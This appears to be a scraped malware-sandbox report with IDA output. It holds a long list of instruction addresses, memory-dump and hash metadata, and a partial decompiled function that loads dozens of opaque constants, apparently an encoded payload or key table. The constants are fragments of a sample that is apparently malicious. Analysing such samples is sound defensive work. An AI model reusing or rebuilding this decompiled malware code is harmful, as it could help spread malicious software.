0x00406111
0x0040614e
0x0040614e
0x00406151
0x00405404
0x0040540b
0x00405413
0x00405418
0x00000000
0x00000000
0x00000000
0x00406157
0x00406157
0x0040615c
0x0040615f
0x004061d6
0x004061d6
0x004061dd
0x004061e0
0x004061e3
0x004061e8
0x004061ee
0x004061f1
0x004061f4
0x004061f7
0x00405404
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040615f
0x00406113
0x00406113
0x00406113
0x00406115
0x0040613a
0x0040613f
0x0040613f
0x00406144
0x00406146
0x00406148
0x00406148
0x00406148
0x0040614b
0x00000000
0x00406117
0x00406117
0x00406117
0x00406117
0x0040611a
0x00000000
0x00000000
0x00406120
0x00406125
0x00406127
0x00406128
0x0040612b
0x0040612d
0x00406130
0x00406133
0x00406136
0x00406138
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406138
0x00406331
0x00406331
0x00000000
0x00406331
0x00406115
0x0040585f
0x0040585f
0x0040585f
0x0040585f
0x00405863
0x00000000
0x00000000
0x00405869
0x00405869
0x0040586c
0x0040588f
0x00405891
0x00405894
0x00405897
0x0040589a
0x0040589d
0x0040589d
0x0040589f
0x004058a2
0x004058a5
0x004058a8
0x00405a6b
0x00405a6b
0x00405a6e
0x00406364
0x00406364
0x0040636b
0x00000000
0x00405a74
0x00405a74
0x00405a74
0x00405a77
0x00405b46
0x00405b46
0x00405b46
0x00405b48
0x00405b48
0x00405b48
0x00405b4b
0x00405b4e
0x00000000
0x00000000
0x00405b54
0x00405b54
0x00405b5b
0x00405b5e
0x00405b60
0x00405b8f
0x00405b8f
0x00405b9a
0x00405ba2
0x00405ba5
0x00405ba8
0x00405baf
0x00405bb1
0x00405bb3
0x00405bb5
0x00405bb8
0x00405bc2
0x00405bc5
0x00405bc7
0x00405bca
0x00000000
0x00405b62
0x00405b62
0x00405b62
0x00405b62
0x00405b65
0x00000000
0x00000000
0x00405b6b
0x00405b70
0x00405b72
0x00405b73
0x00405b76
0x00405b78
0x00405b7b
0x00405b7e
0x00405b81
0x00405b88
0x00405b8b
0x00405b8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b8d
0x00406285
0x00406285
0x00000000
0x00406285
0x00000000
0x00405b60
0x00405bd0
0x00405bd5
0x00405bde
0x00405be4
0x00405be7
0x00405bea
0x00405bea
0x00405bec
0x00405bec
0x00405bec
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405bf4
0x00405bf4
0x00405bf7
0x00405c1a
0x00405c1f
0x00405c22
0x00405c25
0x00405c28
0x00405c2b
0x00405c2e
0x00405c35
0x00405c3f
0x00000000
0x00405bf9
0x00405bf9
0x00405bf9
0x00405bf9
0x00405bfc
0x00000000
0x00000000
0x00405c02
0x00405c07
0x00405c09
0x00405c0a
0x00405c0c
0x00405c0f
0x00405c12
0x00405c15
0x00405c18
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c18
0x00406290
0x00406290
0x00000000
0x00406290
0x00000000
0x00405bf7
0x00405c42
0x00405c42
0x00000000
0x00405a7d
0x00405a7d
0x00405a7d
0x00405a82
0x00405a83
0x00405a84
0x00405a85
0x00405a86
0x00405a88
0x00405a8a
0x00405a8c
0x00405a8d
0x00405a8f
0x00405a91
0x00405a98
0x00405a9e
0x00405aa6
0x00405aa9
0x00405aae
0x00405ab3
0x00405ab8
0x00405abd
0x00405ac5
0x00405acd
0x00405ad5
0x00405add
0x00405ae5
0x00405aeb
0x00405af3
0x00405af7
0x00405afc
0x00405b01
0x00405b06
0x00405b0b
0x00405b10
0x00405b15
0x00405b1d
0x00405b22
0x00405b2a
0x00405b34
0x00405b3e
0x00405c49
0x00405c49
0x00405c49
0x00405c4c
0x00405c4e
0x00000000
0x00000000
0x00405c54
0x00405c63
0x00405c6d
0x00405c83
0x00405c99
0x00405ca2
0x00405ca7
0x00405caa
0x00405cad
0x00405cb0
0x00405cb2
0x00405cb4
0x00405cb4
0x00405cc0
0x00405cc0
0x00405cc0
0x00405cc4
0x00405cc5
0x00405ccc
0x00405ccc
0x00405cc0
0x00405cd0
0x00405cd0
0x00405cd5
0x00405cd6
0x00405cd7
0x00405cd8
0x00405cd9
0x00405cd9
0x00405cdf
0x00405ce5
0x00405ce8
0x00405cf0
0x00405cf0
0x00405cf0
0x00405cf9
0x00405cfb
0x00405cfd
0x00405d04
0x00405d07
0x00405d10
0x00405d17
0x00405d19
0x00405d1c
0x00405d25
0x00405d27
0x00405d2e
0x00405d31
0x00405d31
0x00405d3c
0x00405d3f
0x00405d45
0x00405d48
0x00405d4a
0x00405d51
0x00405d5c
0x00405d5c
0x00405d5f
0x00405d66
0x00405d6d
0x00405d70
0x00405d76
0x00405d76
0x00405d80
0x00405d80
0x00405d85
0x00405d85
0x00405d89
0x00405d8c
0x00405d8e
0x00405d94
0x00405d94
0x00405d9b
0x00405d9f
0x00405da6
0x00405da9
0x00405dab
0x00000000
0x00405db0
0x00405db0
0x00405dbb
0x00405dbe
0x00405dbf
0x00405dc1
0x00405dc4
0x00405dc4
0x00405dc8
0x00405dc8
0x00405dcb
0x00405dcb
0x00405dce
0x00405e1d
0x00405e2d
0x00405e30
0x00405e33
0x00405e36
0x00405e39
0x00405e3c
0x00405e3e
0x00405e43
0x00405e46
0x00405e48
0x00405e48
0x00405e4b
0x00405e4e
0x00405e4e
0x00405e51
0x00405e51
0x00405e54
0x00405e57
0x00405e59
0x00405e59
0x00405e59
0x00405e5c
0x00405e5f
0x00405e62
0x00405e62
0x00405e62
0x00405e70
0x00405e75
0x00405e79
0x00405e7c
0x00405e94
0x00405e7e
0x00405e81
0x00405e85
0x00405e88
0x00405e8a
0x00405e8d
0x00405e90
0x00405e90
0x00405e97
0x00405e97
0x00405e97
0x00405e97
0x00405e97
0x00405e9c
0x00405e9f
0x00405e9f
0x00405ea1
0x00405ea6
0x00405ea6
0x00405eab
0x00405dd0
0x00405dd0
0x00405dd7
0x00405dda
0x00405ddd
0x00405de3
0x00405de9
0x00405de9
0x00405dee
0x00405def
0x00405df0
0x00405df1
0x00405df1
0x00405df6
0x00405dff
0x00405dff
0x00405e05
0x00405e05
0x00405e05
0x00405e08
0x00405e0a
0x00405e0d
0x00405e0d
0x00405e15
0x00405e15
0x00405de3
0x00405dce
0x00405eb3
0x00405eb3
0x00405eb6
0x00405eb7
0x00405eb7
0x00405ec1
0x00405ec6
0x00405ec6
0x00405ec7
0x00405ec7
0x00405ecb
0x004060e6
0x004060e6
0x00000000
0x00405ed1
0x00405ed1
0x00405ed1
0x00405ed1
0x00405ed3
0x00405ed3
0x00405ed3
0x00405ed6
0x00405ed6
0x00405edc
0x00405edf
0x00405ee1
0x00000000
0x00000000
0x00405ee7
0x00405ee7
0x00405eea
0x00405fa2
0x00405fa9
0x00405fb1
0x00405fb4
0x00405fb6
0x00405fc7
0x00000000
0x00405fd0
0x00405fd0
0x00405fd0
0x00405fd5
0x00405fd7
0x00405fde
0x00405fe6
0x00405fe9
0x00405fe9
0x00405fb8
0x00405fb8
0x00405fba
0x00405fbd
0x00405fc2
0x00405fc2
0x00405fed
0x00405fed
0x00405fef
0x00405ff1
0x00405ff4
0x00405ff7
0x00405ffa
0x0040600c
0x0040600c
0x0040601c
0x0040601c
0x00406023
0x00406026
0x00406028
0x00406050
0x0040605e
0x00406061
0x00406068
0x0040606b
0x0040606d
0x00406071
0x00406074
0x00406077
0x00406083
0x00406083
0x00406079
0x00406079
0x00406079
0x00406085
0x00406090
0x00406099
0x0040609c
0x0040609e
0x00405ed3
0x00405ed3
0x00000000
0x0040602a
0x0040602a
0x0040602a
0x0040602a
0x0040602d
0x00000000
0x00000000
0x00406033
0x00406038
0x0040603a
0x0040603b
0x0040603e
0x00406040
0x00406043
0x00406046
0x00406049
0x0040604b
0x00000000
0x0040604d
0x0040604d
0x0040604d
0x00000000
0x0040604d
0x00000000
0x0040604b
0x004062a6
0x004062a6
0x00000000
0x004062a6
0x0040600e
0x0040600e
0x0040600e
0x00406011
0x00406013
0x00406388
0x00406388
0x0040638b
0x00000000
0x00406019
0x00406019
0x00406019
0x00000000
0x00406019
0x00406013
0x00405ffc
0x00405ffc
0x00405ffc
0x00405fff
0x00406006
0x00000000
0x00406006
0x00405ef0
0x00405ef0
0x00405ef5
0x00405ef8
0x00405f7e
0x00405f7e
0x00405f85
0x00405f88
0x00405f8d
0x00405f93
0x00405f96
0x00405f99
0x00405f99
0x00405f9c
0x00000000
0x00405efe
0x00405efe
0x00405efe
0x00405f00
0x00405f05
0x00405f0d
0x00405f0f
0x00405f22
0x00405f22
0x00405f25
0x00000000
0x00405f27
0x00405f27
0x00405f2c
0x00405f2c
0x00405f30
0x00405f30
0x00405f3e
0x00405f49
0x00405f4a
0x00405f4d
0x00405f4f
0x00000000
0x00000000
0x00405f51
0x00405f51
0x00405f54
0x00405f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f56
0x00000000
0x00405f30
0x00405f11
0x00405f11
0x00405f11
0x00405f14
0x00405f16
0x00405f58
0x00405f58
0x00405f5b
0x00405f5b
0x00405f5e
0x0040629b
0x0040629b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f18
0x00405f18
0x00405f18
0x00405f1a
0x00405f9f
0x00405f9f
0x00000000
0x00405f20
0x00405f20
0x00000000
0x00405f20
0x00405f1a
0x00405f16
0x00000000
0x00405f64
0x00405f67
0x00405f69
0x00405f6b
0x00405f6c
0x00405f6e
0x00405f71
0x00405f74
0x00405f77
0x00405f77
0x00000000
0x00405f7c
0x00405ef8
0x00000000
0x00405eea
0x004060a6
0x004060a9
0x004060ac
0x004060ae
0x004060b0
0x00406396
0x00406396
0x00406399
0x00000000
0x004060b6
0x004060b6
0x004060c2
0x004060d3
0x004060d3
0x004060dd
0x004060e3
0x00000000
0x004060e3
0x00000000
0x004060b0
0x00405ed3
0x00405d53
0x00405d53
0x00405d53
0x00405d56
0x00406376
0x00406376
0x0040637d
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d56
0x00000000
0x00405d51
0x004060ee
0x004060ee
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x00000000
0x004055e8
0x00405a77
0x004058ae
0x004058ae
0x004058b0
0x004058b3
0x004058b5
0x004058dc
0x004058de
0x004058e1
0x004058e3
0x004058e5
0x004058e8
0x004058e8
0x004058ea
0x004058ea
0x004058ea
0x004058ed
0x004058f0
0x00000000
0x00000000
0x004058f2
0x004058f2
0x004058f4
0x00405932
0x00405932
0x00405935
0x0040624f
0x0040624f
0x00000000
0x0040593b
0x0040593b
0x0040593b
0x0040593d
0x0040593e
0x00405945
0x00405946
0x00000000
0x00405946
0x004058f6
0x004058f6
0x004058f6
0x004058f9
0x0040591f
0x0040591f
0x00405926
0x00405929
0x0040592c
0x0040592d
0x00000000
0x004058fb
0x004058fb
0x004058fb
0x004058fb
0x004058fe
0x00000000
0x00000000
0x00405904
0x00405909
0x0040590b
0x0040590c
0x0040590e
0x00405911
0x00405914
0x00405917
0x0040591a
0x00000000
0x0040591c
0x0040591c
0x0040591c
0x00000000
0x0040591c
0x00000000
0x0040591a
0x00406244
0x00406244
0x00000000
0x00406244
0x004058f9
0x00000000
0x004058f4
0x0040594b
0x0040595e
0x00405965
0x0040597a
0x0040597d
0x00406352
0x00406352
0x00406359
0x00000000
0x00405983
0x00405983
0x00405983
0x00405986
0x00405986
0x00405986
0x00405988
0x00000000
0x00000000
0x0040598e
0x0040598e
0x00405990
0x004059ec
0x004059ec
0x004059ef
0x004059ef
0x004059ef
0x004059f1
0x00000000
0x00000000
0x00405a01
0x00405a01
0x00405a04
0x00405a06
0x00405a20
0x00405a20
0x00405a23
0x00405a25
0x00406277
0x00406277
0x0040627a
0x00000000
0x00405a2b
0x00405a2b
0x00405a2b
0x00405a30
0x00405a32
0x00405a36
0x00405a39
0x00405a3b
0x00405a44
0x00405a3d
0x00405a3d
0x00405a3f
0x00405a3f
0x00405a46
0x00405a4b
0x00405a4b
0x00405a54
0x00405a59
0x00405a5b
0x00405a5e
0x00405a61
0x00405a63
0x00405a66
0x00000000
0x00405a66
0x00405a08
0x00405a08
0x00405a08
0x00405a0b
0x00405a12
0x00000000
0x00405a12
0x00000000
0x00405a06
0x004059f3
0x004059f3
0x004059f8
0x00000000
0x00405992
0x00405992
0x00405992
0x00405995
0x004059b8
0x004059b8
0x004059bb
0x004059be
0x004059c1
0x004059c4
0x004059cc
0x004059cf
0x004059d2
0x004059d5
0x00406265
0x00406265
0x0040626c
0x00000000
0x004059db
0x004059db
0x004059de
0x004059e1
0x004059e6
0x004059e7
0x00000000
0x004059e7
0x00405997
0x00405997
0x00405997
0x00405997
0x0040599a
0x00000000
0x00000000
0x004059a0
0x004059a5
0x004059a7
0x004059a8
0x004059aa
0x004059ad
0x004059b0
0x004059b3
0x004059b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004059b6
0x0040625a
0x0040625a
0x00000000
0x0040625a
0x00405995
0x00000000
0x00405990
0x00000000
0x00405986
0x004058b7
0x004058b7
0x004058b7
0x004058b7
0x004058ba
0x00000000
0x00000000
0x004058c0
0x004058c5
0x004058c7
0x004058ca
0x004058cc
0x004058cf
0x004058d2
0x004058d5
0x004058d8
0x004058da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004058da
0x00406239
0x00406239
0x00000000
0x00406239
0x004058b5
0x0040586e
0x0040586e
0x0040586e
0x0040586e
0x00405871
0x00000000
0x00000000
0x00405877
0x0040587c
0x0040587e
0x0040587f
0x00405881
0x00405884
0x00405887
0x0040588a
0x0040588d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040588d
0x0040622e
0x0040622e
0x00000000
0x0040622e
0x00000000
0x0040586c
0x004062b1
0x004062b3
0x004062b6
0x004062b8
0x004062e2
0x004062e2
0x004062e7
0x004062ea
0x004062ec
0x004062ee
0x004062f1
0x004062f3
0x004062f5
0x004062f5
0x004062f5
0x004062f8
0x00000000
0x00000000
0x004062fa
0x004062fa
0x004062fb
0x004062fe
0x00406300
0x00000000
0x00000000
0x00000000
0x00406300
0x004062f5
0x00406302
0x00406307
0x00406307
0x0040630b
0x0040630e
0x00406311
0x00406314
0x00406316
0x00406319
0x0040631d
0x00406320
0x00406324
0x00406442
0x00406442
0x00406442
0x00406444
0x00000000
0x0040632a
0x0040632a
0x0040632a
0x004063f3
0x004063f3
0x004063f3
0x004063f6
0x004063f9
0x00000000
0x00000000
0x004063fb
0x004063fb
0x004063fd
0x0040640a
0x0040640a
0x0040640d
0x00406410
0x004063d7
0x004063d7
0x004063dd
0x004063dd
0x004063e0
0x00000000
0x00406412
0x00406412
0x004063ba
0x004063ba
0x004063ba
0x004063bd
0x00000000
0x00000000
0x004063bf
0x004063c4
0x004063c6
0x004063c9
0x004063cb
0x004063cc
0x004063cf
0x004063d2
0x00000000
0x004063d4
0x004063d4
0x004063d4
0x00000000
0x004063d4
0x00000000
0x004063d2
0x0040641c
0x0040641c
0x00000000
0x0040641c
0x004063ff
0x004063ff
0x004063ff
0x00406402
0x00406414
0x00406414
0x00000000
0x00406404
0x00406404
0x00406404
0x00406407
0x004063e3
0x004063e3
0x004063ec
0x004063ef
0x004063ef
0x004063f0
0x00000000
0x004063f0
0x00406402
0x00000000
0x004063fd
0x00000000
0x004063f3
0x004062c0
0x00000000
0x004062c0
0x004062c0
0x004062c0
0x004062c3
0x00000000
0x00000000
0x004062c9
0x004062d0
0x004062d3
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062e0
0x004063b2
0x004063b2
0x00000000
0x004063b2
0x004062b8
0x00405685
0x00405685
0x00405685
0x00405688
0x0040568a
0x0040568e
0x00405690
0x00405693
0x00405696
0x0040569e
0x004056a3
0x004056a6
0x004056a6
0x004056a9
0x004056a9
0x004056b3
0x004056bb
0x004056be
0x004056c0
0x004056c9
0x004056c9
0x004056ce
0x004056cf
0x004056d0
0x004056d1
0x004056d1
0x004056d5
0x004056d7
0x004056dd
0x004056e5
0x004056e5
0x004056e9
0x004056ec
0x004056c2
0x004056c2
0x004056c4
0x004056c4
0x004056ef
0x004056ef
0x004056f2
0x004056f4
0x004056f9
0x004056fc
0x004056fe
0x00405701
0x00405707
0x00405847
0x00405847
0x00405847
0x00405847
0x00000000
0x0040570d
0x0040570d
0x0040570d
0x00405710
0x00405716
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x004055e8
0x00405707
0x0040567f
0x00000000
0x0040571e
0x0040571e
0x00405721
0x004057d3
0x004057da
0x004057e2
0x004057e5
0x004057e7
0x004057f8
0x004057f8
0x004057fd
0x004057fe
0x004057ff
0x00405800
0x00405800
0x00405804
0x00405806
0x0040580a
0x0040580c
0x00405814
0x00405814
0x00405818
0x0040581b
0x004057e9
0x004057e9
0x004057eb
0x004057ee
0x004057f3
0x004057f3
0x0040581e
0x0040581e
0x00405820
0x00405822
0x00405825
0x00405828
0x0040582e
0x00000000
0x00405830
0x00405830
0x00405830
0x00405833
0x00405836
0x0040621c
0x0040621c
0x00406223
0x00000000
0x0040583c
0x0040583c
0x0040583c
0x0040583f
0x00000000
0x0040583f
0x00405836
0x00405727
0x00405727
0x00405727
0x0040572a
0x004057af
0x004057af
0x004057b6
0x004057b9
0x004057be
0x004057c4
0x004057c7
0x004057ca
0x004057ca
0x004057cd
0x00000000
0x00405730
0x00405730
0x00405730
0x00405732
0x00405737
0x0040573f
0x00405741
0x00405754
0x00405754
0x00405757
0x00000000
0x00405759
0x00405759
0x0040575e
0x00405761
0x00405761
0x0040576f
0x0040577a
0x0040577b
0x0040577e
0x00405780
0x00000000
0x00000000
0x00405782
0x00405782
0x00405785
0x00405787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405787
0x00000000
0x00405761
0x00405743
0x00405743
0x00405743
0x00405746
0x00405748
0x00405789
0x00405789
0x0040578c
0x0040578c
0x0040578f
0x00406211
0x00406211
0x00000000
0x00000000
0x00000000
0x00000000
0x0040574a
0x0040574a
0x0040574a
0x0040574c
0x004057d0
0x004057d0
0x00000000
0x00405752
0x00405752
0x00000000
0x00405752
0x0040574c
0x00405748
0x00000000
0x00405795
0x00405798
0x0040579a
0x0040579c
0x0040579d
0x0040579f
0x004057a2
0x004057a5
0x004057a8
0x004057a8
0x00000000
0x004057ad
0x0040572a
0x00000000
0x00405721
0x004055e8
0x004063a4
0x004063a4
0x004063a4
0x004063a7
0x0040644a
0x0040644a
0x00000000
0x0040644a
0x00405470
0x00405470
0x00405472
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a5
0x004054a8
0x004054ab
0x00000000
0x00405474
0x00000000
0x00405474
0x00405482
0x00405484
0x00405485
0x00405488
0x0040548a
0x0040548d
0x00405490
0x00405495
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405495
0x0040633c
0x00406422
0x00406422
0x0040642b
0x00406430
0x00406430
0x00406433
0x00406436
0x00406439
0x0040643b
0x0040643b
0x0040643e
0x00406440
0x0040644d
0x0040644d
0x00406450
0x00406452
0x00406454
0x00406454
0x00406454
0x00406457
0x00000000
0x00000000
0x00406459
0x00406459
0x0040645a
0x0040645d
0x0040645f
0x00000000
0x00000000
0x00000000
0x0040645f
0x00406454
0x00406452
0x0040643e
0x00406439
0x00405472
0x00000000
0x00405426
0x00405426
0x0040542b
0x0040542c
0x0040542d
0x00405430
0x00405430
0x00405434
0x00405436
0x0040543c
0x00405444
0x00405444
0x00405448
0x0040544b
0x0040544e
0x00000000
0x0040544e
0x00405404
0x00406461
0x00406461
0x00406464
0x00406466
0x0040646b
0x0040646e
0x00406471
0x00406474
0x00406476
0x00406479
0x00406483
0x0040648e
0x00406491
0x00406495
0x0040649b
0x004064a1
0x004064a7
0x004064aa
0x004064ad
0x004064b2
0x004064b5
0x004064b7
0x004064bd
0x004064bd
0x004064bf
0x004064c5
0x004064c5
0x004064cf
0x004064d5
0x004064de
0x004064e1
0x004064e4
0x004064e6
0x004064ea
0x004064ed
0x004064f3
0x004064f3
0x004064f5
0x004064f5
0x004064f5
0x004064f7
0x004064fa
0x004064fd
0x00406503
0x00406503
0x00406508
0x00406509
0x0040650a
0x0040650b
0x0040650b
0x0040650b
0x00406510
0x00406510
0x00406513
0x00406516
0x00406521
0x0040652c
0x00406537
0x00406542
0x0040654d
0x00406558
0x00406563
0x00406568
0x0040656b
0x0040656d
0x00406572
0x00406574
0x00406574
0x00406579
0x0040657c
0x0040657c
0x0040657f
0x0040657f
0x00406581
0x00406584
0x00406586
0x00406588
0x0040658c
0x0040658f
0x00406591
0x00406591
0x00406596
0x0040659e
0x004065a2
0x004065a2
0x004065a6
0x004065b0
0x004065b0
0x004065b3
0x004065b5
0x004065b9
0x004065bb
0x004065be
0x004065c0
0x004065c2
0x004065c2
0x004065c2
0x004065c5
0x004065c8
0x004065cb
0x004065ce
0x004065d1
0x004065d1
0x004065d4
0x004065d4
0x004065d6
0x004065d8
0x004065de
0x004065e0
0x004065e2
0x004065e2
0x004065e3
0x004065e3
0x004065e6
0x004065e9
0x004065eb
0x004065eb
0x004065eb
0x004065ed
0x004065f2
0x004065fd
0x00406609
0x0040660f
0x00406611
0x00406611
0x00406611
0x00406614
0x00406619
0x0040661c
0x0040661c
0x00406625
0x0040662a
0x0040662a
0x0040662b
0x0040662e
0x00406630
0x00406633
0x00406635
0x00406637
0x0040663b
0x0040663d
0x00406645
0x00406645
0x0040663b
0x00406635
0x004064bf
0x00406648
0x00406650
0x00000000
0x00406650
0x00406347
0x00406347
0x00000000

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05cb80e8c7a3c2038d2e6dc2aa23a411dec1b227ede524c6b0ec4535f6f852f1
Instruction ID: 18a765e30b5d23c85ffe977a78652ca3f3e04101cad17b4a2a40a98a22425ddf
Opcode Fuzzy Hash: 05cb80e8c7a3c2038d2e6dc2aa23a411dec1b227ede524c6b0ec4535f6f852f1
Instruction Fuzzy Hash: 8B128E71E0062A9BCF08CF69C9902BEBBB2FF55300F25417BC856B7784D2389951DB99

Uniqueness

Uniqueness Score: 0.00%

Function 00401550, Relevance: .0, Instructions: 38COMMON

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e1c488a342ea24eca664d41f770b53f038f58e96adc4850e85e9c98d5656c2
Instruction ID: 091501c5de09c468f8d144d84d48eb2d067c42175b90b167c524242ade1209ab
Opcode Fuzzy Hash: 64e1c488a342ea24eca664d41f770b53f038f58e96adc4850e85e9c98d5656c2
Instruction Fuzzy Hash: 32F0D132A00115EBCB20CF45CD80676B3E6FB94344B99406BE8466B390EB38AD41C669

Uniqueness

Uniqueness Score: 0.00%

Function 0040717A, Relevance: 40.7, APIs: 3, Strings: 20, Instructions: 467
memorylibraryUNIQUE

C-Code - Quality: 97%

			E0040717A(void* __esi, void* __eflags) {
				int _t452;
				void* _t454;
				void* _t459;
				void* _t461;
				void* _t462;
				void* _t463;

				 *((intOrPtr*)(_t463 - 0x6fc)) = 0xda13a380;
				 *((intOrPtr*)(_t463 - 0x6f8)) = 0x4a2d724d;
				 *((intOrPtr*)(_t463 - 0x6f4)) = 0xbbbef731;
				 *((intOrPtr*)(_t463 - 0x6f0)) = 0x335bc7e2;
				 *((intOrPtr*)(_t463 - 0x6ec)) = 0xfe1b3ebb;
				 *((intOrPtr*)(_t463 - 0x6e8)) = 0x1517088;
				 *((intOrPtr*)(_t463 - 0x6e4)) = 0xc306eafb;
				 *((intOrPtr*)(_t463 - 0x6e0)) = 0xe7eb6c1f;
				 *((intOrPtr*)(_t463 - 0x6dc)) = 0x38670867;
				 *((intOrPtr*)(_t463 - 0x6d8)) = 0xcd989c2d;
				 *((intOrPtr*)(_t463 - 0x6d4)) = 0x22f5ead6;
				 *((intOrPtr*)(_t463 - 0x6d0)) = 0xf84e10bf;
				 *((intOrPtr*)(_t463 - 0x6cc)) = 0xdc8796e2;
				 *((intOrPtr*)(_t463 - 0x6c8)) = 0x369fd1c8;
				 *((intOrPtr*)(_t463 - 0x6c4)) = 0x2b6014cc;
				 *((intOrPtr*)(_t463 - 0x6c0)) = 0x37772353;
				 *((intOrPtr*)(_t463 - 0x6bc)) = 0x1fdd8645;
				 *((intOrPtr*)(_t463 - 0x6b8)) = 0x9296362b;
				 *((intOrPtr*)(_t463 - 0x6b4)) = 0x1e1487d7;
				 *((intOrPtr*)(_t463 - 0x6b0)) = 0xcc9a4641;
				 *((intOrPtr*)(_t463 - 0x6ac)) = 0xe415f087;
				 *((intOrPtr*)(_t463 - 0x6a8)) = 0x62ae3378;
				 *((intOrPtr*)(_t463 - 0x6a4)) = 0x10a872c0;
				 *((intOrPtr*)(_t463 - 0x6a0)) = 0x2f5a0b3e;
				 *((intOrPtr*)(_t463 - 0x69c)) = 0xec070bd9;
				 *((intOrPtr*)(_t463 - 0x698)) = 0x554b37ff;
				 *((intOrPtr*)(_t463 - 0x694)) = 0x3214b6e6;
				 *((intOrPtr*)(_t463 - 0x690)) = 0x1c6154ae;
				 *((intOrPtr*)(_t463 - 0x68c)) = 0x859bc5de;
				 *((intOrPtr*)(_t463 - 0x688)) = 0x7ee4a1a6;
				 *((intOrPtr*)(_t463 - 0x684)) = 0x28946554;
				 *((intOrPtr*)(_t463 - 0x680)) = 0x4d3d51f;
				 *((intOrPtr*)(_t463 - 0x67c)) = 0x8ccb73df;
				 *((intOrPtr*)(_t463 - 0x678)) = 0x3dbead2;
				 *((intOrPtr*)(_t463 - 0x674)) = 0x299093ec;
				 *((intOrPtr*)(_t463 - 0x670)) = 0x912d9436;
				 *((intOrPtr*)(_t463 - 0x66c)) = 0xbe49d910;
				 *((intOrPtr*)(_t463 - 0x668)) = 0x27a738a5;
				 *((intOrPtr*)(_t463 - 0x664)) = 0x8907b220;
				 *((intOrPtr*)(_t463 - 0x660)) = 0xc8ed5966;
				 *((intOrPtr*)(_t463 - 0x65c)) = 0xdc3fcee6;
				 *((intOrPtr*)(_t463 - 0x658)) = 0x9e10caf6;
				 *((intOrPtr*)(_t463 - 0x654)) = 0x4453d80;
				 *((intOrPtr*)(_t463 - 0x650)) = 0x226e4280;
				 *((intOrPtr*)(_t463 - 0x64c)) = 0xc6aced26;
				 *((intOrPtr*)(_t463 - 0x648)) = 0xa539b9b;
				 *((intOrPtr*)(_t463 - 0x644)) = 0xd276a9b5;
				 *((intOrPtr*)(_t463 - 0x640)) = 0x34d76a8d;
				 *((intOrPtr*)(_t463 - 0x63c)) = 0xf3f37ec1;
				 *((intOrPtr*)(_t463 - 0x638)) = 0xc3074508;
				 *((intOrPtr*)(_t463 - 0x634)) = 0x8e2cbf38;
				 *((intOrPtr*)(_t463 - 0x630)) = 0x5335e85f;
				 *((intOrPtr*)(_t463 - 0x62c)) = 0x1636db53;
				 *((intOrPtr*)(_t463 - 0x628)) = 0xf5fca815;
				 *((intOrPtr*)(_t463 - 0x624)) = 0xb4447e5c;
				 *((intOrPtr*)(_t463 - 0x620)) = 0xc360be71;
				 *((intOrPtr*)(_t463 - 0x61c)) = 0x5b604abd;
				 *((intOrPtr*)(_t463 - 0x618)) = 0x9d64890;
				 *((intOrPtr*)(_t463 - 0x614)) = 0xa490b32e;
				 *((intOrPtr*)(_t463 - 0x610)) = 0xabed6f87;
				 *((intOrPtr*)(_t463 - 0x60c)) = 0x67fc4fe0;
				 *((intOrPtr*)(_t463 - 0x608)) = 0xe983bc6a;
				 *((intOrPtr*)(_t463 - 0x604)) = 0x7b8ea4e6;
				 *((intOrPtr*)(_t463 - 0x600)) = 0x553e608a;
				 *((intOrPtr*)(_t463 - 0x5fc)) = 0x40451882;
				 *((intOrPtr*)(_t463 - 0x5f8)) = 0x870018c2;
				 *((intOrPtr*)(_t463 - 0x5f4)) = 0x5dd1138d;
				 *((intOrPtr*)(_t463 - 0x5f0)) = 0x854db42f;
				 *((intOrPtr*)(_t463 - 0x5ec)) = 0xdca42c0c;
				 *((intOrPtr*)(_t463 - 0x5e8)) = 0xd96f55d7;
				 *((intOrPtr*)(_t463 - 0x5e4)) = 0xf57dccd;
				 *((intOrPtr*)(_t463 - 0x5e0)) = 0x70dfccd0;
				 *((intOrPtr*)(_t463 - 0x5dc)) = 0xfb1196b8;
				 *((intOrPtr*)(_t463 - 0x5d8)) = 0x4e6cd616;
				 *((intOrPtr*)(_t463 - 0x5d4)) = 0xe5ce3506;
				 *((intOrPtr*)(_t463 - 0x5d0)) = 0x62ce63b;
				 *((intOrPtr*)(_t463 - 0x5cc)) = 0x9c78bdb5;
				 *((intOrPtr*)(_t463 - 0x5c8)) = 0x56222b50;
				 *((intOrPtr*)(_t463 - 0x5c4)) = 0x8f638c3a;
				 *((intOrPtr*)(_t463 - 0x5c0)) = 0x7f6fd8ad;
				 *((intOrPtr*)(_t463 - 0x5bc)) = 0x8307f23b;
